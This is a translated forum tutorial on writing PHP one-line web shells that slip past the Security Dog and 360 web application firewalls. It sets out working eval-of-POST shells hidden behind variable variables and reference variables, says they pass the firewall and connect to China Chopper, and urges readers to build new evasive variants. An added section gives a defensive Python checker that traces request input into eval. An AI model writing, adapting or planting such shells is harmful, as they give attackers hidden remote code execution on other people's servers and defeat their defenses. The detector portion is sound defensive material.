[WEB] Writing a PHP one-sentence shell that bypasses Security Dog and 360

Source: Internet
Author: User

00x01
Security Dog is really a headache, especially when uploading or writing a one-sentence shell: Security Dog intercepts it and the shell gets caught.
Of course, Security Dog is one of the simplest WAFs, and it is easy to bypass.
00x02
For Security Dog and 360 I do not have many tricks, but the following two are very practical:

1. Variable variables
2. Reference variables

00x03
## Variable variables (the China Chopper client may report an error)
<?php @eval($_POST['x']);?>

Anyone who uses it often knows that this is the simplest one-sentence shell, and every WAF has a rule for it.
Let's start by adding what is required.
<?php
$a = 'b';
$b = $_POST['x'];
@eval($$a);

Let's test whether it gets killed.

As you can see, it gets past Security Dog successfully. Next we test the connection.

And it connects successfully.
## Code analysis
<?php
$a = 'b';
$b = $_POST['x'];
@eval($$a);
?>


Let's look at the second line of code
$a = 'b';

Anyone who knows about variable variables should be able to read this: the $a in the third line's $$a is b, so to speak $a is replaced by b.
Keep looking at line three.
$b = $_POST['x'];

According to the first line, you know that $$a is $b; $b is used to receive the POST-submitted data.

The last line, the fourth
@eval($$a);

Executing $$a is equivalent to executing the variable named by $a, that is, $b. Finally, we integrate it into one sentence
<?php $a = 'b'; $b = $_POST['x']; @eval($$a); ?>

Summary
Variable variables are quite flexible against Security Dog.
But note D Shield: the technique is only suitable for Security Dog and 360, so it is fairly targeted.

00x04
## Reference variables
<?php @eval($_POST['x']);?>

Still the original one-sentence shell; I will write the code first.
<?php
$a = $_POST['x'];
$b =& $a;
@eval($b);
?>

We continue by testing whether it gets killed.

As you can see, it gets past Security Dog in the same way. We go on to test whether it can connect.

As you can see, it connects and can be operated.
## Code analysis
<?php
$a = $_POST['x'];
$b =& $a;
@eval($b);
?>

Let's look at the second line of code
$a = $_POST['x'];

$a is used to receive the POST-submitted data.
Keep looking at the third line of code

$b =& $a;

$b refers to the memory address of $a, which is indirectly equivalent to $b receiving the POST-submitted data.
The last, fourth line of code:
@eval($b);

Execute $b. Finally, let's integrate it into one sentence.
<?php $a = $_POST['x']; $b =& $a; @eval($b); ?>

Summary (the same as for variable variables)
Reference variables are quite flexible against Security Dog.
But note D Shield: the technique is only suitable for Security Dog and 360, so it is fairly targeted.
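
From the defender's side, both variants read request input into `eval` through one level of aliasing, which a literal `eval($_POST` signature never sees. The following check is an added example, not code from the original article: the sample strings, function names and regex heuristics are constructed assumptions, and it assumes straight-line PHP with simple assignments rather than a full parser.

```python
import re

# Constructed samples modelled on the snippets discussed above.
SAMPLES = {
    "plain": "<?php @eval($_POST['x']); ?>",
    "variable_variable": "<?php $a = 'b'; $b = $_POST['x']; @eval($$a); ?>",
    "reference": "<?php $a = $_POST['x']; $b =& $a; @eval($b); ?>",
    "benign": "<?php $t = 'b'; $b = $config['code']; eval($$t); ?>",
}

SOURCE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"\$(\w+)\s*=(?![=>])\s*&?\s*([^;]+);")
SINK = re.compile(r"\b(?:eval|assert)\s*\(\s*([^;]+?)\s*\)\s*;")
NAIVE = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)")  # literal signature

def resolve(expr, strings):
    """Return the variable name that '$x' or '$$x' actually reads, else None."""
    m = re.fullmatch(r"(\$+)(\w+)", expr.strip())
    if not m:
        return None
    name = m.group(2)
    for _ in range(len(m.group(1)) - 1):  # each extra '$' is one indirection
        name = strings.get(name)
        if name is None:
            return None
    return name

def find_request_eval(php):
    """List eval/assert arguments that trace back to request input."""
    tainted, strings = set(), {}
    for name, rhs in ASSIGN.findall(php):
        rhs = rhs.strip()
        literal = re.fullmatch(r"""(['"])(\w+)\1""", rhs)
        if SOURCE.search(rhs):
            tainted.add(name)                 # $b = $_POST['x'];
        elif literal:
            strings[name] = literal.group(2)  # $a = 'b';  (target of $$a)
        elif resolve(rhs, strings) in tainted:
            tainted.add(name)                 # $b = $a;  or  $b =& $a;
    return [arg for arg in SINK.findall(php)
            if SOURCE.search(arg) or resolve(arg, strings) in tainted]

def naive_hit(php):
    """What a literal-signature rule would report."""
    return bool(NAIVE.search(php))

if __name__ == "__main__":
    for label, php in SAMPLES.items():
        print(label, naive_hit(php), find_request_eval(php))
```

The check is flow-insensitive, so it will over-report on code that reassigns a variable after sanitising it; that trade-off is usually acceptable when triaging uploaded files.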

00x05
Big Summary
1# Understand the principle; if you copy blindly, you will not be able to write your own once Security Dog updates.
2# Be ingenious: combine various methods to write all kinds of unusual one-sentence shells, so that the effect lasts.
3# Exchange ideas with people often. Communication is fundamental to learning; only by sharing ideas and combining them can one be called an expert.
4# Security Dog is just a very simple WAF, so do not stop here; keep a low profile and pursue stronger techniques.

00x06
1# Of course, I have only listed some of them; there are many other ways, such as function substitution, keyword splitting, double variables and so on.
2# This is my first time writing an article, so it may not be written very well; if you have suggestions, please leave a comment, thank you very much.
3# In the future I will share ideas on WAF injection, please support us!

This article source: Http://bbs.ichunqiu.com/thread-9012-1-1.html?from=bky
